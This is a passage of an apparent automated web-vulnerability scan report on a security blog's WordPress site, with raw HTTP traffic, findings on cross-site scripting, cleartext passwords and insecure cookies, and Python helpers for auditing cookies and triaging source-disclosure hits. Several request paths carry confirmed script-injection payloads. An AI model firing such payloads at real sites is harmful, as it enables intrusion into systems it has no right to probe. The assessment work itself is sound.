Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:39 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11384


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<title>Login or nothing found for Wp-admin Css '&quot;--&gt;&lt; Style&gt;&lt; Script&gt;&lt;script&gt;netsparker(0x000427)&lt; Script&gt;</title>
<link rel="shortcut icon" href="https://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico" />
<link rel="profile" href="http://gmpg.org/xfn/11" />
/wp-admin/css/colors-fresh.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00042B)%3C/script%3E CONFIRMED

https://www.digitalbond.com/wp-admin/css/colors-fresh.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript..

Parameters

Parameter Type Value
ver GET 20110121
URI-BASED Raw URI '"--></style></script><script>alert(0x00042B)</script>

Request

GET /wp-admin/css/colors-fresh.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00042B)%3C/script%3E HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 20:05:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:05:41 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 11399


Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.
/ CONFIRMED

http://www.digitalbond.com/

Form target action

http://www.digitalbond.com/?_login=901a9f54ca

Request

GET / HTTP/1.1
Referer: https://www.digitalbond.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Tue, 19 Apr 2011 19:04:40 GMT
Vary: Cookie,User-Agent,Accept-Encoding
Expires: Tue, 19 Apr 2011 21:04:40 GMT
Pragma: public
Etag: 8a23d5686352708df19d38ee5e9312c0
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Cacheable: NO:Passed
Cache-Control: max-age=0, must-revalidate
X-Varnish: 1668547416
Age: 0
Via: 1.1 varnish
X-Cache: PASS
X-Type: varnish-short
Content-Encoding:


id="menu-item-8657" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-8657"><a><span>What&#8217;s Hot:</span></a></li><li id="menu-item-8653" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8653"><a href="http://www.digitalbond.com/tools/bandolier/"><span>Bandolier</span></a></li><li id="menu-item-8654" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8654"><a href="http://www.digitalbond.com/tools/portaledge/"><span>Portaledge</span></a></li><li id="menu-item-8655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-8655"><a href="http://www.digitalbond.com/tools/quickdraw/"><span>Quickdraw SCADA IDS</span></a></li><li id="menu-item-9624" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-9624"><a href="http://www.digitalbond.com/category/vulnerabilities/vulnerability-disclosure-vulnerabilities/"><span>Vulnerability Disclosure</span></a></li></ul></div>

</td>
<!-- / Header -->

</tr>

<!-- Main Body -->
<tr id="bodyrow">




<!-- Main Column -->
<td id="middle">





<div class="post-9778 post type-post status-publish format-standard hentry category-control-system-it category-ics-security-technologies tag-database-security tag-security-hardening tag-sql-server odd" id="post-9778">


<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/" rel="bookmark" title="Permanent Link to SQL2000 Server Security">SQL2000 Server Security</a></h2>
</div>
<div class="post-byline">Marco Cajina</div>
<div class="post-bodycopy clearfix"><div class="twitter_button" style="float: right; margin-left: 10px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fwww.digitalbond.com%2F2011%2F04%2F19%2Fsql2000-server-security%2F&amp;count=horizontal&amp;related=digitalbond:&amp;via=digitalbond&amp;lang=en" height="20" width="110" frameborder="0" scrolling="no" allowtransparency="true"></iframe></div><p><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/basics.jpg"><img class="alignleft size-full wp-image-9786" title="basics" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/basics.jpg" alt="" width="240" height="185" /></a></p><p style="padding-top: 30px;">First, how many of you can actually say that you can be 100% certain that you know the exact number of SQL servers in your environment?  Also, how many of you are certain that they are locked down?  Were you aware that there is a stored procedure that runs commands as the Local System account and that it is enabled by default on SQL2000 or earlier versions of SQL?</p><p>The topic of security hardening typically covers lowering the footprint of the operating system and control system software to minimize risk exposure; however, it should also cover lowering the database footprint.  Here is a general guide for hardening your SQL2000 or earlier servers.</p><ul><li>Generate a password for the built-in SA account.</li><li>Create and use a service account to run the SQL Windows services to minimize the impact of a compromised database server or instance.</li><li>Revoke the BuiltIn\Administrators groups access sysadmin access to the database server.  You can then create new logins for any Windows accounts that need access to the database (i.e. Service Accounts, DBAs, etc.).</li><li>Revoke access to the xp_cmdshell and other extended stored procedures.  
You can create a new role and only grant that role access to execute the procedures.</li><li>Remove the named pipes connectivity and use TCP/IP connections only.</li></ul><p> <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/#more-9778" class="more-link">Read More</a></p></div>

<div class="post-footer">19 April 2011 | <a href="http://www.digitalbond.com/2011/04/19/sql2000-server-security/#respond" class="comments-link" title="Comment on SQL2000 Server Security">Leave a comment</a></div>

</div><!-- / Post -->


<div class="post-9773 post type-post status-publish format-standard hentry category-1 tag-critical-intelligence tag-ics-security-calendar even" id="post-9773">


<div class="post-headline"> <h2> <a href="http://www.digitalbond.com/2011/04/15/friday-news-and-notes-130/" rel="bookmark" title="Permanent Link to Friday News and Notes">Friday News and Notes</a></h2>
</div>
<div class="post-byline">Dale G Peterson</div>
<div class="post-bodycopy clearfix"><div class="twitter_button" style="float: right; margin-left: 10px;"><iframe src="http://platform.twitter.com/widgets/tweet_button.html?url=http%3A%2F%2Fwww.digitalbond.com%2F2011%2F04%2F15%2Ffriday-news-and-notes-130%2F&amp;count=horizontal&amp;related=digitalbond:&amp;via=digitalbond&amp;lang=en" height="20" width="110" frameborder="0" scrolling="no" allowtransparency="true"></iframe></div><p><a href="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/fork.jpg"><img class="alignleft size-full wp-image-9774" title="fork" src="http://digibond.wpengine.netdna-cdn.com/wp-content/uploads/2011/04/fork.jpg" alt="SCADA Security" width="180" height="240" /></a></p><p style="padding-top: 30px;">A record breaking Microsoft Patch Tuesday this week with at least 64 security vulnerabilities fixed. <a href="http://krebsonsecurity.com/2011/04/microsoft-issues-monster-patch-update/?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A+KrebsOnSecurity+%28Krebs+on+Security%29">Krebs highlights one in particular</a>. &#8220;Attackers could exploit the flaw addressed by MS11-020 by sending a single, specially crafted evil data packet to a targeted system. This is the type of flaw that should concern any network administrator, because it has high potential to be used to power an automated computer worm.&#8221;</p><p>Another week and two more ICS vulnerabilites. This time in <a href="http://www.us-cert.gov/control_systems/pdf/ICSA-11-094-01.pdf">Wonderware&#8217;s InBatch Client</a> and <a href="http://www.us-cert.gov/control_systems/pdf/ICSA-11-103-01.pdf">Honeywell&#8217;s ScanServer</a>. Wonderware is a very popular and is often used to modernize the HMI&#8217;s in older control systems and also as the complete SCADA solution for smaller installations. Honewell&#8217;s ScanServer is used in building automation, especially HVAC. 
NCCIC also released <a href="http://www.us-cert.gov/control_systems/pdf/NCCIC_Phishing_Advisory.pdf">a bulletin on spear phishing</a>, perhaps because both of the vulnerabilities would likely require some amount of social engineering.</p><h3>Tweet of the Week</h3><!-- tweet id : 58523720687435776 --> <style type='text/css'> #bbpBox_58523720687435776 a { text-decoration:none; color:#0084B4; } #bbpBox_58523720687435776 a:hover { text-decoration:underline; } </style> <div id='bbpBox_58523720687435776' class='bbpBox' style='padding:20px; margin:5px 0; background-color:#C0DEED; background-image:url(http://a3.twimg.com/a/1302111227/images/themes/theme1/bg.png); background-repeat:no-repeat'> <div style='background:#fff; padding:10px; margin:0; min-height:48px; color:#333333; -moz-border-radius:5px; -webkit-border-radius:5px;'> <span style='width:100%; font-size:18px; line-height:22px;'> What would you do if Law Enforcement wanted to seize a CCA for evidence purposes? <a href="http://twitter.com/search?q=%23IRPExercise" title="#IRPExercise">#IRPExercise</a> </span> <div class='bbp-actions' style='font-size:12px; width:100%; padding:5px 0; margin:0 0 10px 0; border-bottom:1px solid #e6e6e6;'> <img align='middle' src='http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/twitter-blackbird-pie//images/bird.png' /> <a title='tweeted on 14 Apr 2011 08:35' href='http://twitter.com/#!/mtoecker/status/58523720687435776' target='_blank'>14 Apr 2011 08:35</a> via web <a href='https://twitter.com/intent/tweet?in_reply_to=58523720687435776' class='bbp-action bbp-reply-action' title='Reply'> <span><em style='margin-left: 1em;'></em><strong>Reply</strong></span> </a> <a href='https://twitter.com/intent/retweet?tweet_id=58523720687435776' class='bbp-action bbp-retweet-action' title='Retweet'> <span><em style='margin-left: 1em;'></em><strong>Retw..
Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A cookie was set over HTTPS without the Secure attribute. A browser sends such a cookie over plain HTTP as well as over HTTPS, so an attacker who can observe the victim's network traffic, or who holds a MITM (man-in-the-middle) position, can capture it without having to break TLS at all.

Impact

Because the Secure attribute is missing, the browser will also send this cookie over an HTTP connection. If the cookie is important (such as a session cookie), an attacker who can observe that cleartext traffic can capture it and hijack the victim's session. An attacker in a MITM position does not even need to wait for the victim to visit an http:// page: he or she can force the victim's browser to make a plain HTTP request to the site (for example by redirecting it, or by injecting a reference into another cleartext page) and read the cookie from that request.

Actions to Take

  1. See the remedy for the solution.
  2. Mark all cookies used within the application as secure. (If a cookie is not related to authentication and does not carry any personal information, it does not have to be marked as secure.)

Remedy

Mark all cookies used within the application as secure by adding the Secure attribute to the Set-Cookie header, so that browsers only send them over HTTPS. This is only practical when every page that needs the cookie is served over HTTPS; otherwise the cookie will simply be absent on the HTTP pages.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires access to the victim's network or to a system on the path between the victim and the web server. Attackers need to understand layer 2 and either have physical access to systems that act as way points for the traffic, or have already compromised a host between the victim and the web server.
- /wp-login.php

/wp-login.php CONFIRMED

https://www.digitalbond.com/wp-login.php?action=register

Identified Cookie

PHPSESSID

Request

GET /wp-login.php?action=register HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=10
Set-Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,wordpress_test_cookie=WP+Cookie+check; path=/,wordpress_test_cookie=WP+Cookie+check; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 19 Apr 2011 19:55:55 GMT
Vary: User-Agent,Accept-Encoding
Content-Encoding:
Content-Length: 2361
X-Type: backend


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head> <title>Digital Bond&#039;s SCADA Security Portal &rsaquo; Registration Form</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel='stylesheet' id='login-css' href='https://www.digitalbond.com/wp-admin/css/login.css?ver=20110121' type='text/css' media='all' /><link rel='stylesheet' id='colors-fresh-css' href='https://www.digitalbond.com/wp-admin/css/colors-fresh.css?ver=20110121' type='text/css' media='all' /><script type='text/javascript' src='https://www.digitalbond.com/wp-includes/js/l10n.js?ver=20101110'></script><script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script><script type='text/javascript' src='https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a'></script><link rel='stylesheet' id='cimy_uef_register-css' href='https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/css/cimy_uef_register.css?ver=3.1.1' type='text/css' media='all' /> <style type="text/css">
#login h1 a {
background: url(http://www.digitalbond.com/wp-content/Cimy_User_Extra_Fields/digitalbond_logo_final_328.png) no-repeat top center;
background-position: center top;
width: 328px;
height: 165px;
text-indent: -9999px;
overflow: hidden;
padding-bottom: 15px;
display: block;
}
</style>
<meta name='robots' content='noindex,nofollow' /></head><body class="login"><div id="login"><h1><a href="http://wordpress.org/" title="Powered by WordPress">Digital Bond&#039;s SCADA Security Portal</a></h1><p class="message register">Register For This Site</p><form name="registerform" id="registerform" action="https://www.digitalbond.com/wp-login.php?action=register" method="post"> <p> <label>Username<br /> <input type="text" name="user_login" id="user_login" class="input" value="" size="20" tabindex="10" /></label> </p> <p> <label>E-mail<br /> <input type="text" name="user_email" id="user_email" class="input" value="" size="25" tabindex="20" /></label> </p><!-- Start code from Cimy User Extra Fields 2.0.3 Copyright (c) 2006-2011 Marco Cimmino http://www.marcocimmino.net/cimy-wordpress-plugins/cimy-user-extra-fields/--> <input type="hidden" name="cimy_post" value="1" /> <p id="cimy_uef_wp_p_field_1"> <label for="cimy_uef_wp_1">First name</label><input type="text" name="cimy_uef_wp_FIRSTNAME" id="cimy_uef_wp_1" class="cimy_uef_input_27" value="" maxlength="20" tabindex="21" /> </p> <p id="cimy_uef_wp_p_field_2"> <label for="cimy_uef_wp_2">Last name</label><input type="text" name="cimy_uef_wp_LASTNAME" id="cimy_uef_wp_2" class="cimy_uef_input_27" value="" maxlength="25" tabindex="22" /> </p> <p id="cimy_uef_wp_p_field_3"> <label for="cimy_uef_wp_3">Password</label><input type="password" name="cimy_uef_wp_PASSWORD" id="cimy_uef_wp_3" class="cimy_uef_input_27" value="" maxlength="16" tabindex="23" /> </p> <p id="cimy_uef_wp_p_field_4"> <label for="cimy_uef_wp_4">Password confirmation</label><input type="password" name="cimy_uef_wp_PASSWORD2" id="cimy_uef_wp_4" class="cimy_uef_input_27" value="" maxlength="16" tabindex="24" /> </p> <h2>Password_Tips</h2> <p id="cimy_uef_p_desc_7" class="desc"><br />Use your weak password on this site. Do not use one of your strong, important passwords because it will be sent in an email.

Registration is free of charge and you will not purchase anything with this account. </p> <p id="cimy_uef_p_field_7"> <input type="checkbox" name="cimy_uef_TIP" id="cimy_uef_7" class="cimy_uef_checkbox" value="1" tabindex="25" /><label class="cimy_uef_label_checkbox" for="cimy_uef_7"> </label><br /> </p> <p id="cimy_uef_p_field_1"> <label for="cimy_uef_1">Enter your company's name</label><input type="text" name="cimy_uef_COMPANY" id="cimy_uef_1" class="cimy_uef_input_27" value="" maxlength="63" tabindex="26" /> </p> <p id="cimy_uef_p_field_5"> <label for="cimy_uef_5">Enter your industry sector</label><input type="text" name="cimy_uef_SECTOR" id="cimy_uef_5" class="cimy_uef_input_27" value="" maxlength="63" tabindex="27" /> </p> <p id="cimy_uef_p_field_6"> <label for="cimy_uef_6">What country are you in?</label><input type="text" name="cimy_uef_COUNTRY" id="cimy_uef_6" class="cimy_uef_input_27" value="" maxlength="25" tabindex="28" /> </p> <div style="width: 278px; float: left; height: 80px; vertical-align: text-top;"> <img id="captcha" align="left" style="padding-right: 5px; border: 0" src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php" alt="CAPTCHA Image" /> <object type="application/x-shockwave-flash" data="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&#038;bgColor1=#fff&#038;bgColor2=#fff&#038;iconColor=#777&#038;borderWidth=1&#038;borderColor=#000" height="19" width="19"><param name="movie" value="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.swf?audio=https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_play.php&#038;bgColor1=#fff&#038;bgColor2=#fff&#038;iconColor=#777&#038;borderWidth=1&#038;borderColor=#000" /></object> <br /><br /><br /><br /> <a 
align="right" tabindex="29" style="border-style: none" href="#" onclick="document.getElementById('captcha').src = 'https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/securimage_show_captcha.php?' + Math.random(); return false"><img src="https://www.digitalbond.com/wp-content/plugins/cimy-user-extra-fields/securimage/images/refresh.gif" alt="Change image" border="0" onclick="this.blur()" align="bottom" /></a> </div> <div style="width: 278px; float: left; height: 50px; vertical-align: bottom; padding: 5px;"> Insert the code:&nbsp;<input type="text" name="securimage_response_field" size="10" maxlength="6" tabindex="30" /> </div><!-- End of code from Cimy User Extra Fields--> <p id="reg_passmail">A password will be e-mailed to you.</p> <br class="clear" /> <input type="hidden" name="redirect_to" value="" /> <p class="submit"><input type="submit" name="wp-submit" id="wp-submit" class="button-primary" value="Register" tabindex="100" /></p></form><p id="nav"><a href="https://www.digitalbond.com/wp-login.php">Log in</a> |<a href="https://www.digitalbond.com/wp-login.php?action=lostpassword" title="Password Lost and Found">Lost your password?</a></p></div><script type="text/javascript">try{document.getElementById('user_login').focus();}catch(e){}if(typeof wpOnload=='function')wpOnload();</script><p id="backtoblog"><a href="https://www.digitalbond.com/" title="Are you lost?">&larr; Back to Digital Bond&#039;s SCADA Security Portal</a></p></body></html>
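The response above shows the three Set-Cookie headers folded into one comma-separated line, and the PHPSESSID cookie carries only path=/: no Secure attribute, and also no HttpOnly, which the scanner does not flag here but which leaves the cookie readable by script. PHPSESSID is PHP's default session cookie, created by session_start() (on this page presumably by the captcha plugin rather than by WordPress core, an inference from the registration form shown), so the Secure attribute for it is controlled by PHP's session.cookie_secure setting or session_set_cookie_params(), not by a WordPress option. The checker below is an added example, not part of the report or of Netsparker: it splits a folded Set-Cookie line without breaking on the comma inside an Expires date, reports which flags each cookie lacks, and produces the hardened header. The header sample is copied from the response above; SESSION_COOKIE_NAMES is an assumption about which cookies actually matter.

```python
import re

# Constructed from the response captured above: the report shows the three
# Set-Cookie headers folded into one comma-separated line.
FOLDED_SET_COOKIE = (
    "PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; path=/,"
    "wordpress_test_cookie=WP+Cookie+check; path=/,"
    "wordpress_test_cookie=WP+Cookie+check; path=/"
)

# PHP's default session cookie name. Extend this set with any other cookie that
# carries authentication state (assumption: only PHPSESSID matters here).
SESSION_COOKIE_NAMES = {"PHPSESSID"}

# Split a folded header only at commas that begin a new name=value pair, so the
# comma inside an Expires date ("Wed, 11 Jan 1984 ...") does not break a cookie.
_COOKIE_BOUNDARY = re.compile(r",(?=\s*[^;,=\s]+=)")


def split_set_cookie(header):
    """Return the individual Set-Cookie values from a folded header line."""
    return [part.strip() for part in _COOKIE_BOUNDARY.split(header) if part.strip()]


def parse_set_cookie(value):
    """Parse one Set-Cookie value into (name, value, {attribute: value-or-True})."""
    first, *rest = [p.strip() for p in value.split(";")]
    name, _, cookie_value = first.partition("=")
    attrs = {}
    for item in rest:
        if not item:
            continue
        key, _, val = item.partition("=")
        # Flag attributes (Secure, HttpOnly) have no value; record them as True.
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), cookie_value, attrs


def audit_cookies(header, session_names=SESSION_COOKIE_NAMES):
    """Report, per cookie, which of Secure/HttpOnly are missing and whether the
    cookie is a session cookie (where the missing flags actually matter)."""
    report = []
    for raw in split_set_cookie(header):
        name, _, attrs = parse_set_cookie(raw)
        missing = [flag for flag in ("secure", "httponly") if flag not in attrs]
        report.append({"name": name, "missing": missing, "session": name in session_names})
    return report


def harden_set_cookie(value):
    """Return the Set-Cookie value with Secure and HttpOnly appended where absent."""
    _, _, attrs = parse_set_cookie(value)
    hardened = value.rstrip("; ")
    for flag, token in (("secure", "Secure"), ("httponly", "HttpOnly")):
        if flag not in attrs:
            hardened += "; " + token
    return hardened


if __name__ == "__main__":
    for entry in audit_cookies(FOLDED_SET_COOKIE):
        print(entry)
    print(harden_set_cookie(split_set_cookie(FOLDED_SET_COOKIE)[0]))
```

Run it directly to see the per-cookie report and the hardened PHPSESSID header; audit_cookies() is the function to call from a larger script that walks a whole scan's responses.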
[Possible] PHP Source Code Disclosure

1 TOTAL
MEDIUM
Netsparker identified a web page that discloses PHP (server-side) source code. An attacker can obtain the server-side source code of the web application, which can contain sensitive data such as database connection strings, usernames and passwords, along with the technical and business logic of the application. Findings prefixed [Possible] have not been confirmed by the scanner and should be verified manually before they are reported.

Impact

Depending on the source code, database connection strings, usernames and passwords, and the internal workings and business logic of the application can be revealed. With such information an attacker can mount the following types of attacks:
  • Access the database or other data resources. Depending on the privileges of the account obtained from the source code, it may be possible to read, update or delete arbitrary data in the database.
  • Gain access to password-protected administrative mechanisms such as dashboards, management consoles and admin panels, hence gaining full control of the application.
  • Develop further attacks by investigating the source code for input validation errors and logic vulnerabilities.

Actions to Take

  1. Where the file is not required, delete it from the server. Where such files are required, ensure that their permissions prevent users from accessing them via the web server.
  2. Ensure that the web server's security patches are up to date and that the latest stable version of the web server software is in use.
  3. Remove all temporary and backup files from the server.

Required skills for successful exploitation

This depends on the information obtained from the source code. Uncovering this kind of vulnerability does not require a high level of skill. However, a highly skilled attacker could leverage it to obtain account details for databases or administrative panels, ultimately leading to control of the application or even of the host the application resides on.
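
The instance listed for this finding is the theme's DD_roundies.js, served as Content-Type: application/x-javascript with X-Type: static/local, and its body is the unmodified library. The only "<?" in it is the "<?import namespace=... ?>" VML processing instruction that the script writes for IE8, which is almost certainly what a PHP open-tag signature matched on (an inference from the response shown, not something the report states). The triage routine below is an added example, not part of the report or of Netsparker, and separates genuine PHP open tags from XML processing instructions before a hit is reported. Both input samples are constructed: JS_SAMPLE reproduces the offending line from the response, LEAK_SAMPLE is an invented backup file with placeholder values.

```python
import re

# Constructed samples. JS_SAMPLE is the line from the DD_roundies.js response in this
# finding that a "<?" signature trips on; LEAK_SAMPLE is a made-up backup file of the
# kind a genuine disclosure looks like (placeholder values, nothing from the target).
JS_SAMPLE = r"""document.writeln('<?import namespace="' + this.ns + '" implementation="#default#VML" ?>');"""
LEAK_SAMPLE = "<?php\n$db_user = 'example';\n$db_pass = 'example';\nmysql_connect('localhost', $db_user, $db_pass);\n?>"

# A real PHP open tag: "<?php" or the short echo tag "<?=".
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.IGNORECASE)
# An XML processing instruction such as <?xml ...?> or <?import ...?>: a target name,
# whitespace, pseudo-attributes and the closing "?>" with no ">" in between.
XML_PI = re.compile(r"<\?([A-Za-z_][\w.-]*)\s[^>]*\?>")
# Tokens that look like PHP code rather than markup. JavaScript function declarations
# also match, so this is only consulted once a "<?" has actually been seen.
PHP_CODE_HINT = re.compile(r"\$[A-Za-z_]\w*\s*=|\bfunction\s+\w+\s*\(|\b(?:echo|require|include)(?:_once)?\b")


def classify_source_disclosure(body, content_type=""):
    """Triage a "PHP source disclosure" hit on a response body.

    Returns ("php", detail) for a probable leak, ("xml-pi", targets) when every "<?"
    is a well-formed processing instruction, ("ambiguous", detail) for a bare "<?"
    that is neither, and ("clean", None) when there is no "<?" at all."""
    if PHP_OPEN_TAG.search(body):
        hints = len(PHP_CODE_HINT.findall(body))
        return "php", f"PHP open tag with {hints} code-like token(s); Content-Type {content_type or 'unknown'}"
    targets = []
    for m in re.finditer(r"<\?", body):
        pi = XML_PI.match(body, m.start())
        if pi:
            targets.append(pi.group(1))
        elif PHP_CODE_HINT.search(body, m.end()):
            # short_open_tag style "<? ... ?>" followed by PHP-looking code
            return "php", "short open tag '<?' followed by PHP-like code"
        else:
            return "ambiguous", "'<?' that is neither a PHP tag nor a processing instruction"
    if targets:
        return "xml-pi", ", ".join(sorted(set(targets)))
    return "clean", None


if __name__ == "__main__":
    print(classify_source_disclosure(JS_SAMPLE, "application/x-javascript"))
    print(classify_source_disclosure(LEAK_SAMPLE, "text/plain"))
```

Run against the captured JavaScript the routine returns an "xml-pi" verdict naming the import target, while the constructed backup file comes back as "php" with a count of code-like tokens; anything "ambiguous" still deserves a manual look, because a short-tag PHP fragment with no recognisable tokens would land there.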

- /wp-content/themes/atahualpa/js/DD_roundies.js

/wp-content/themes/atahualpa/js/DD_roundies.js

https://www.digitalbond.com/wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a

Request

GET /wp-content/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Referer: https://www.digitalbond.com/wp-login.php?action=register
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.digitalbond.com
Cookie: PHPSESSID=5c8a40ddb91f1a2acfe18880a9fdfdca; wordpress_test_cookie=WP+Cookie+check
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 19:55:55 GMT
Content-Type: application/x-javascript
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=10
Last-Modified: Fri, 14 Jan 2011 21:06:20 GMT
Expires: Wed, 20 Apr 2011 19:55:55 GMT
Cache-Control: max-age=86400
X-Type: static/local
Content-Encoding:


/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.addRule('#doc .container', '10px 5px'); // selector and multiple radii
* DD_roundies.addRule('.box', 5, true); // selector, radius, and optional addition of border-radius code for standard browsers.
*
* Just want the PNG fixing effect for IE6, and don't want to also use the DD_belatedPNG library? Don't give any additional arguments after the CSS selector.
* DD_roundies.addRule('.your .example img');
**/

var DD_roundies = {

ns: 'DD_roundies',

IE6: false,
IE7: false,
IE8: false,
IEversion: function() {
if (document.documentMode != 8 && document.namespaces && !document.namespaces[this.ns]) {
this.IE6 = true;
this.IE7 = true;
}
else if (document.documentMode == 8) {
this.IE8 = true;
}
},
querySelector: document.querySelectorAll,
selectorsToProcess: [],
imgSize: {},

createVmlNameSpace: function() { /* enable VML */
if (this.IE6 || this.IE7) {
document.namespaces.add(this.ns, 'urn:schemas-microsoft-com:vml');
}
if (this.IE8) {
document.writeln('<?import namespace="' + this.ns + '" implementation="#default#VML" ?>');
}
},

createVmlStyleSheet: function() { /* style VML, enable behaviors */
/*
Just in case lots of other developers have added
lots of other stylesheets using document.createStyleSheet
and hit the 31-limit mark, let's not use that method!
further reading: http://msdn.microsoft.com/en-us/library/ms531194(VS.85).aspx
*/
var style = document.createElement('style');
document.documentElement.firstChild.insertBefore(style, document.documentElement.firstChild.firstChild);
if (style.styleSheet) { /* IE */
try {
var styleSheet = style.styleSheet;
